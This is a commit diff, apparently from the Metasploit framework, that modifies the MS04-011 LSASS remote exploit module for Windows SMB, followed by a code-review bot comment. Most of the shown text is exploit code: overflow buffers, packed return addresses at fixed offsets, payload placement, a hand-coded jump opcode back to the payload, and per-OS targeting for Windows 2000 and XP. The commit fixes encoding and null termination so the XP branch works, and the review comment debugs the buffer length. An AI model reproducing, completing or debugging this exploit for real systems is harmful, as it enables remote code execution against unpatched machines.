This fixes #44. The XP string was missing NDR encoding and null termination.
git-svn-id: file:///home/svn/framework3/trunk@4511 4d416f70-5f16-0410-b530-b9f4589650da
unstable
parent
851328fbae
commit
db198485a4
|
@ -97,8 +97,9 @@ class Exploits::Windows::Smb::MS04_011_LSASS < Msf::Exploit::Remote
|
||||||
|
|
||||||
# Check the remote OS name and version
|
# Check the remote OS name and version
|
||||||
os = smb_peer_os
|
os = smb_peer_os
|
||||||
string = ''
|
buff = ''
|
||||||
case os
|
case os
|
||||||
|
|
||||||
# Windows 2000 requires that the string be unicode formatted
|
# Windows 2000 requires that the string be unicode formatted
|
||||||
# and give us a nice set of registers which point back to
|
# and give us a nice set of registers which point back to
|
||||||
# the un-unicoded data. We simply return to a nop sled that
|
# the un-unicoded data. We simply return to a nop sled that
|
||||||
|
@ -108,7 +109,8 @@ class Exploits::Windows::Smb::MS04_011_LSASS < Msf::Exploit::Remote
|
||||||
str = rand_text_alphanumeric(3500)
|
str = rand_text_alphanumeric(3500)
|
||||||
str[2020, 4] = [targets[1]['Rets'][0]].pack('V')
|
str[2020, 4] = [targets[1]['Rets'][0]].pack('V')
|
||||||
str[2104, payload.encoded.length ] = payload.encoded
|
str[2104, payload.encoded.length ] = payload.encoded
|
||||||
string = NDR.UnicodeConformantVaryingString(str)
|
buff = NDR.UnicodeConformantVaryingString(str)
|
||||||
|
|
||||||
# Windows XP is a bit different, we need to use an ascii
|
# Windows XP is a bit different, we need to use an ascii
|
||||||
# buffer and a jmp esp. The esp register points to an
|
# buffer and a jmp esp. The esp register points to an
|
||||||
# eight byte segment at the end of our buffer in memory,
|
# eight byte segment at the end of our buffer in memory,
|
||||||
|
@ -116,17 +118,20 @@ class Exploits::Windows::Smb::MS04_011_LSASS < Msf::Exploit::Remote
|
||||||
# buffer, giving us about 1936 bytes of space for a
|
# buffer, giving us about 1936 bytes of space for a
|
||||||
# payload.
|
# payload.
|
||||||
when /Windows 5\.1/
|
when /Windows 5\.1/
|
||||||
str = rand_text_alphanumeric(7000)
|
str = rand_text_alphanumeric(7000) + "\x00\x00"
|
||||||
str[0, payload.encoded.length ] = payload.encoded
|
str[0, payload.encoded.length ] = payload.encoded
|
||||||
str[1964, 4] = [targets[2]['Rets'][0]].pack('V')
|
str[1964, 4] = [targets[2]['Rets'][0]].pack('V')
|
||||||
str[1980, 5] = "\xe9\x3f\xf8\xff\xff" # jmp back to payload
|
str[1980, 5] = "\xe9\x3f\xf8\xff\xff" # jmp back to payload
|
||||||
string = str
|
str[6998, 2] = "\x00\x00"
|
||||||
|
buff = NDR.UnicodeConformantVaryingStringPreBuilt(str)
|
||||||
|
|
||||||
|
# Unsupported target
|
||||||
else
|
else
|
||||||
print_status("No target is available for #{ os }")
|
print_status("No target is available for #{ os }")
|
||||||
return
|
return
|
||||||
end
|
end
|
||||||
|
|
||||||
stub = string +
|
stub = buff +
|
||||||
NDR.long(rand(0xFFFFFF)) +
|
NDR.long(rand(0xFFFFFF)) +
|
||||||
NDR.UnicodeConformantVaryingString('') +
|
NDR.UnicodeConformantVaryingString('') +
|
||||||
NDR.UnicodeConformantVaryingString('') +
|
NDR.UnicodeConformantVaryingString('') +
|
||||||
|
|
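Review bot: The XP branch now null-terminates the buffer twice: `str = rand_text_alphanumeric(7000) + "\x00\x00"` already appends a terminator, and `str[6998, 2] = "\x00\x00"` then overwrites the last two random bytes as well, so the buffer ends in four null bytes and is 7002 bytes long instead of the 7000 the old code produced. Keep only one of the two lines — `str[6998, 2] = "\x00\x00"` alone preserves the original length — unless the extra two bytes are intentional, in which case that deserves saying. If `NDR.UnicodeConformantVaryingStringPreBuilt` derives its length fields from `str.length` (its implementation is not visible here), the choice changes the encoded counts, so whichever line stays should carry a comment such as `# buffer must already include its null terminator; PreBuilt encodes it as-is`. The enclosing method and `case os` begin before the first hunk, and the `stub = buff +` expression continues past the last one.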